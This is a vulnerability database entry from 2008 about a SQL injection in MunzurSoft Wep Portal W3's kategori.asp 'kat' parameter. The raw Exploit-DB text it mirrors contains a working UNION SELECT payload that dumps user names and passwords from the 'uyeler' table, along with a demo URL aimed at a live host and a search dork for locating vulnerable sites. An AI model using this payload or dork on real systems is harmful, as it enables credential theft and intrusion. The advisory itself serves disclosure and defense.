MunzurSoft Wep Portal W3 SQL Injection Vulnerability

vendor:

Wep Portal W3

by:

LUPUS

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Wep Portal W3

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

MunzurSoft Wep Portal W3 SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'kat' parameter of 'kategori.asp' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to bypass authentication, compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should sanitize all user-supplied input to prevent SQL injection attacks.

Source

Exploit-DB raw data:

Author : LUPUS
Home  : www.megaturks.net / www.biyosecurity.com
E-Mail : By[nokta]lupus @gmail.com

----------------------------------------------------------------
Down : http://www.aspindir.com/indir.asp?ID=5636
----------------------------------

Dork : "MunzurSoft Wep Portal W3"
------------------------------------

Demo  : http://www.munzursoft.somee.com/www/kategori.asp?kat=2%20union+select+all+0,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13+from+uyeler
--------------------------------------
Exploit
union+select+all+0,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13+from+uyeler
---------------------------------------------

Greetz : ENO7 - Liz0zim - Kerem125 - Prens - SaO - The_BekiR - h4ckinger - ZeberuS
---------------------------------------
Note: Ã–nemli Olan Ä°nsan OlmaktÄ±r.

# milw0rm.com [2008-10-10]